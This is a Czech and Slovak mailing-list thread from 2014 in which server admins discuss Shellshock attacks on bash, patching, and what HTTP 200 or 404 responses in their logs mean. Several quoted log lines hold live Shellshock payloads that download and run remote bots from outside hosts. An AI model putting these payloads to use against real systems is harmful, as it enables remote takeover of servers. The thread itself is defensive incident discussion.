Vyhodou FastCGI a podobnych je to, ze amanipulovat env neni tak
jednoduche, jelikoz info o jednotlivych requestech se predava jinak,
konkretne u FastCGI socketem.
Takze opravdu v zasade ani 200, ani 404 nemusi nic znamenat :(
Zdar, Petr
On 9/29/14, Ján Raška <raskaj(a)gmail.com> wrote:
Osobne si myslim ze 200 odpovede nemusia nic
znamenat. Ked si vsimnes, 404
to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale
/ ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je
hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho
zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod.
vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod.
nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne
povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit
bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial
zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne
obsah tych params spustit v shelli alebo nie :)
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list On 29 Sep 2014, at 10:37, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz>
wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi
200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh
HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O
/var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf
/var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot
-O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh
/tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi
Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
> možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
> úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list 
8:05 a.m.
New subject: {Disarmed} Re: Útoky na bash běží
Ahoj,
tak ja mam v apache logu toto:
/var/log/httpd/access_log:173.45.100.18 - - [28/Sep/2014:23:42:22 +0200]
"GET /cgi-bin/hi HTTP/1.0" 404 295 "-" "() { :;}; /bin/bash -c
\"cd
/tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat
; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Skript, na ktery to odkazuje se da stahnout a rika si "perlbot"...
Vojta
Dne 29. září 2014 9:57 Jiří Medvěd <admin(a)jirimedved.cz> napsal(a):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hele,
z jineho stroje:
/var/log/nginx/access.log-20140929.gz:70.42.149.67 - -
[28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() {
:;};
/bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash
jsou v plném
proudu, podle logu se mi včera někdo snažil do serveru nahrát
rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9
fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH
=W15o
-----END PGP SIGNATURE-----
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
8:01 a.m.
ja som si nasiel (zatial len v ramci jedneho vhostu) asi 20 pokusov
(rozne url hlavne zacinajuce cgi-):
62.210.75.170 - - [28/Sep/2014:20:12:58 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 3071 "() { :; }; wget
http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "()
{ :; }; wget http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >>
/dev/null"
skusal som pre tu srandu stiahnut ten subor z creditstat.ru ze so do
toho pozrem ale uz to hlasi E404
On 09/29/2014 09:41 AM, Petr Krcmar wrote:
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v
plném proudu,
podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit
ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
3744
days inactive
3745
days old
community-list@lists.vpsfree.cz
52 comments
22 participants
participants (22)
-
"Jan B. Kolář" -
Egon Eckert -
Jan Sedlák -
Jaroslav Skřivan -
Jirka Bourek -
Jiří Medvěd -
Jiří Čermák -
Juraj Chlebec -
Ján Raška -
Michal Dobsovic -
Michal Kovarcik -
Michal Miklos -
Miroslav Vadkerti -
Nikos Timiopulos -
Pavol Hluchý -
Petr Krcmar -
Petr Sykora -
Petr Tesařík -
Petr Vanek -
René Klačan -
Stanislav Petr -
Vojtěch Sigler